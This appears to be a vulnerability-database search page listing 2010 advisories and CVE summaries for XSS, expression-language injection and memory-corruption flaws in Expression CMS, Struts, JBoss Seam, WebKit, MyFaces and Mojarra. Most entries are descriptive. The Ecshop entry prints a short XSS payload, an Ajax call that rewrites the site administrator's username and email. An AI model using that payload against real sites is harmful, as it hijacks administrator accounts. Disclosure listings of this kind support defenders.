Lucene search

9083 matches found

securityvulns
added 2010/10/11 12:0 a.m., 35 views

XSS vulnerability in Expression CMS

Vulnerability ID: HTB22618 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinexpressioncms1.html Product: Expression Vendor: Backbone Technology http://www.backbonetechnology.com Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions Vendor Notification: 22 September 201...

0.3 AI score
Exploits 0
Packet Storm
added 2010/10/11 12:0 a.m., 24 views

Expression Cross Site Scripting

Vulnerability ID: HTB22618 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinexpressioncms1.html Product: Expression Vendor: Backbone Technology http://www.backbonetechnology.com Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions...

0.2 AI score
Exploits 0
htbridge
added 2010/09/22 12:0 a.m., 30 views

Cross-site Scripting (XSS) Vulnerabilities in Expression CMS

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Expression CMS which could be exploited to perform cross-site scripting attacks. 1 Cross-site scripting (XSS) vulnerability in Expression CMS 1.1 The vulnerability exists due to input sanitation error in the...

4.3 CVSS, 6.3 AI score
Exploits 0, Affected Software 1
seebug.org
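added 2010/09/20 12:0 a.m., 24 views

Ecshop 2.7.2 persistent XSS (can obtain the administrator account)

Brief description: When a user edits their profile, JavaScript code is not filtered strictly enough, so XSS code goes straight into the database. Details: The password-protection question field is not filtered with a regular expression, while all the other fields are. We can enter XSS in the password-protection question, but the admin backend does not show the password-protection question when viewing member details, so this only works once a new "member registration item" has been added in the site backend; after that, it is shown when the details are viewed in the backend. Here, fill in a piece of code that includes an external js: " The content of the external test.js file is as follows: Ajax.call'privilege.php?act=update','id=1&username=heihei&[email protected]','',"POST","JSON"; Proof of vulnerability:...

7.1 AI score
Exploits 0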
Cvelist
added 2010/08/17 5:31 p.m., 33 views

CVE-2010-1870

The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the "" protection mechanis...

9.4 AI score, 0.92533 EPSS
Exploits 22, References 12
RedHat Linux
added 2010/08/04 9:30 p.m., 2 views

perl regular expression UTF parsing errors

Buffer overflow in the polymorphic opcode support in the Regular Expression Engine (regcomp.c) in Perl 5.8 allows context-dependent attackers to execute arbitrary code by switching from byte to Unicode (UTF) characters in a regular expression...

7.5 CVSS, 6.2 AI score, 0.08802 EPSS
Exploits 1, References 4
Positive Technologies
added 2010/08/04 12:0 a.m., 4 views

PT-2010-1176 · Red Hat · Jboss Seam 2 +1

Name of the Vulnerable Software and Affected Versions: JBoss Seam 2 versions 2.0 through 2.3 JBoss Enterprise Application Platform version 4.3.0 Description: The issue is related to the improper sanitization of inputs for JBoss Expression Language (EL) expressions in JBoss Seam 2, which can be...

8.8 CVSS, 9.8 AI score, 0.93789 EPSS
Exploits 8, References 19
NVD
added 2010/07/30 8:30 p.m., 8 views

CVE-2010-1792

WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted regular expression...

9.3 CVSS, 8.9 AI score, 0.05982 EPSS
Exploits 0, References 18
Prion
added 2010/07/30 8:30 p.m., 9 views

Memory corruption

WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted regular expression...

9.3 CVSS, 8.1 AI score, 0.05982 EPSS
Exploits 0, References 18, Affected Software 1
UbuntuCve
added 2010/07/30 8:30 p.m., 20 views

CVE-2010-1792

WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted regular expression...

9.3 CVSS, 6.2 AI score, 0.05982 EPSS
Exploits 0, References 2
Debian CVE
added 2010/07/30 8:0 p.m., 17 views

CVE-2010-1792

Removed by vendor...

9.3 CVSS, 6.6 AI score, 0.05982 EPSS
Exploits 0
RedHat Linux
added 2010/07/27 12:51 p.m., 1 views

Seam2: Improper sanitization of parametrized JBoss EL expressions (ACE)

JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when th...

8.8 CVSS, 7.8 AI score, 0.93789 EPSS
Exploits 8, References 5
NVD
added 2010/05/27 7:0 p.m., 17 views

CVE-2010-2086

Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that...

4 CVSS, 5.9 AI score, 0.02948 EPSS
Exploits 1, References 2
OSV
added 2010/05/27 7:0 p.m., 2 views

DEBIAN-CVE-2010-2087

Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements v...

4.3 CVSS, 6.3 AI score, 0.0025 EPSS
Exploits 2, References 1
NVD
added 2010/05/27 7:0 p.m., 13 views

CVE-2010-2087

Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements v...

4.3 CVSS, 5.9 AI score, 0.0025 EPSS
Exploits 2, References 2
OSV
added 2010/05/27 7:0 p.m., 5 views

CVE-2010-2087

Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements v...

6 AI score
Exploits 0, References 2
Prion
added 2010/05/27 7:0 p.m., 20 views

Cross site scripting

Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that...

4 CVSS, 6.3 AI score, 0.02948 EPSS
Exploits 1, References 2, Affected Software 1
Cvelist
added 2010/05/27 6:32 p.m., 26 views

CVE-2010-2086

Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that...

5.9 AI score, 0.02948 EPSS
Exploits 1, References 2
Debian CVE
added 2010/05/27 6:32 p.m., 24 views

CVE-2010-2087

Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements v...

4.3 CVSS, 5.8 AI score, 0.0025 EPSS
Exploits 2
Cvelist
added 2010/05/27 6:32 p.m., 17 views

CVE-2010-2087

Oracle Mojarra 1.214 and 2.0.2, as used in IBM WebSphere Application Server, Caucho Resin, and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements v...

5.9 AI score, 0.0025 EPSS
Exploits 2, References 2